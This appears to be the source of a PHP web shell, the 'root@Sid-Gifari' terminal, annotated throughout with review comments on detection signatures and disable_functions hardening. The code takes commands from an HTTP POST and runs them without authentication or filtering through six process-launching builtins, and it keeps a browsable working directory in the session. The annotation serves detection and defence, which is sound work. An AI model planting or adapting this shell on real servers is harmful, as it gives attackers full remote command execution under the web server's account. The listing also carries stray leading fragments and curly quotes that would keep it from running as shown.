<html><td>
<?= htmlspecialchars
// NOTE(review): this listing is a web shell: it takes text from an HTTP POST and runs
// it as an OS command under the web server's account. No authentication or
// authorization check appears anywhere in the visible code. A file like this found
// in a web root is an indicator of compromise, not an application feature.
// The session opened here carries the working directory from one request to the next.
session_start();

// Process-launching PHP builtins that the script probes for. Despite the original
// label ("Allowed functions"), this is not an allow-list of permitted commands.
// Detection: one PHP file naming all six of these functions is a strong static
// signature for file-integrity and content scanners.
// Hardening: list every one of them in php.ini's disable_functions when the
// application does not need to spawn processes.
$execFunctions = [‘passthru’, ‘system’, ‘exec’, ‘shell_exec’, ‘proc_open’, ‘popen’];

// Record whether at least one of those builtins is defined in this PHP runtime;
// the loop stops at the first hit.
$canExecute = false;
foreach ($execFunctions as $func) {
if (function_exists($func)) {
$canExecute = true;
break;
}
}

// Initialize cwd: on the first request of a session, remember the PHP process's
// current directory.
if (!isset($_SESSION[‘cwd’])) {
$_SESSION[‘cwd’] = getcwd();
}

// Change directory if POSTed: a "path" form field naming an existing directory
// replaces the stored cwd (canonicalised by realpath()).
// NOTE(review): the value is not confined to any base directory, so every directory
// that is_dir() accepts for the web server account is reachable.
if (isset($_POST[‘path’]) && is_dir($_POST[‘path’])) {
$_SESSION[‘cwd’] = realpath($_POST[‘path’]);
}

// Working copies for this request: the directory to run in and the text to display.
$cwd = $_SESSION[‘cwd’];
$output = “”;

// Process terminal input: this branch runs when the submit field "terminal" is
// present in the POST body; the command text comes from the "terminal-text" field.
// NOTE(review): nothing before this point checks credentials, a CSRF token or the
// request origin, so any client that can reach the URL reaches command execution.
// Detection: POST bodies carrying the field names terminal, terminal-text and path
// together are a request-level indicator wherever request bodies are inspected.
if (isset($_POST[‘terminal’])) {
$cmdInput = trim($_POST[‘terminal-text’]);

// Handle cd inside PHP rather than in a child process; presumably because a
// directory change made by a spawned command would not outlive that command, so
// the script keeps the location in the session instead.
if (preg_match(‘/^cd\s*(.*)$/’, $cmdInput, $matches)) {
$dir = trim($matches[1]);

// An empty argument or "~" maps to the document root (falling back to the current
// cwd); an argument that does not start with / or \ is taken relative to the cwd.
if ($dir === ” || $dir === ‘~’) {
$dir = $_SERVER[‘DOCUMENT_ROOT’] ?? $cwd;
} elseif ($dir[0] !== ‘/’ && $dir[0] !== ‘\\’) {
$dir = $cwd . DIRECTORY_SEPARATOR . $dir;
}

// realpath() canonicalises the path and yields false when it does not exist.
$realDir = realpath($dir);

// Persist the new location only when it resolves to a real directory; otherwise
// imitate the shell's own error text.
// NOTE(review): these messages are HTML-escaped here and $output is escaped again
// when it is printed, so special characters in a path are shown double-escaped.
if ($realDir && is_dir($realDir)) {
$_SESSION[‘cwd’] = $realDir;
$cwd = $realDir;
$output = “Changed directory to ” . htmlspecialchars($realDir);
} else {
$output = “bash: cd: ” . htmlspecialchars($matches[1]) . “: No such file or directory”;
}

} else {

if ($canExecute) {

// Run from the directory remembered in the session.
chdir($cwd);

// NOTE(review): the original comment here ("Allow safe characters") does not match
// the code. No filtering, quoting or escaping is applied: the raw POST text with a
// stderr-to-stdout redirect appended becomes the command line as-is.
$cmd = $cmdInput . ” 2>&1″;

// Fallback chain: the first builtin that is defined gets used. For hardening this
// means disabling only some of the six leaves the remaining ones reachable.
// Detection: whichever branch runs, the host sees the web server / PHP worker
// process spawning a command interpreter, which process-lineage monitoring on the
// web server account can alert on.
if (function_exists(‘passthru’)) {
// passthru() writes straight to the response, so output buffering captures it.
ob_start();
passthru($cmd);
$output = ob_get_clean();

} elseif (function_exists(‘system’)) {
// system() also prints as it runs; captured the same way.
ob_start();
system($cmd);
$output = ob_get_clean();

} elseif (function_exists(‘exec’)) {
// exec() collects output lines into $out; they are re-joined with newlines.
exec($cmd, $out);
$output = implode(“\n”, $out);

} elseif (function_exists(‘shell_exec’)) {
$output = shell_exec($cmd);

} elseif (function_exists(‘proc_open’)) {
// Pipes for stdin (0), stdout (1) and stderr (2); $cwd is passed as the child's
// working directory.
$pipes = [];
$process = proc_open($cmd, [
0 => [“pipe”, “r”],
1 => [“pipe”, “w”],
2 => [“pipe”, “w”]
], $pipes, $cwd);

if (is_resource($process)) {
// stdin is closed unused; stdout is read to the end, then stderr is appended.
fclose($pipes[0]);
$output = stream_get_contents($pipes[1]);
fclose($pipes[1]);
$output .= stream_get_contents($pipes[2]);
fclose($pipes[2]);
proc_close($process);
} else {
$output = “Failed to execute command via proc_open.”;
}

} elseif (function_exists(‘popen’)) {
// Read-only pipe to the child's output.
$handle = popen($cmd, ‘r’);
if ($handle) {
$output = stream_get_contents($handle);
pclose($handle);
} else {
$output = “Failed to execute command via popen.”;
}

} else {
$output = “Error: No command execution functions available.”;
}

} else {
// Reached when the earlier probe found none of the six builtins defined.
$output = “Command execution functions are disabled on this server.”;
}
}
}

// Defaults for the form rendered after this PHP section, applied only when the
// variables are not already set; presumably so the snippet can be included from
// another script that supplies them.
// NOTE(review): only the PHP_SELF fallback is HTML-escaped here; a $url_inc set
// elsewhere is echoed into the form's action attribute without escaping.
// Detection: the prompt text the page prints, "root@Sid-Gifari:", is a distinctive
// string to search for in web roots and in captured responses.
if (!isset($url_inc)) $url_inc = htmlspecialchars($_SERVER[‘PHP_SELF’]);
if (!isset($path)) $path = $cwd;
?>

<strong>root@Sid-Gifari:<?php echo htmlspecialchars($cwd); ?>$</strong><br>
<pre><?php echo htmlspecialchars($output); ?></pre>

<form method=”post” action=”<?php echo $url_inc; ?>”>
<input type=”text” name=”terminal-text” size=”30″ placeholder=”Cmd” />
<input type=”hidden” name=”path” value=”<?php echo htmlspecialchars($path); ?>” />
<input type=”submit” name=”terminal” value=”Execute” />
</form></html>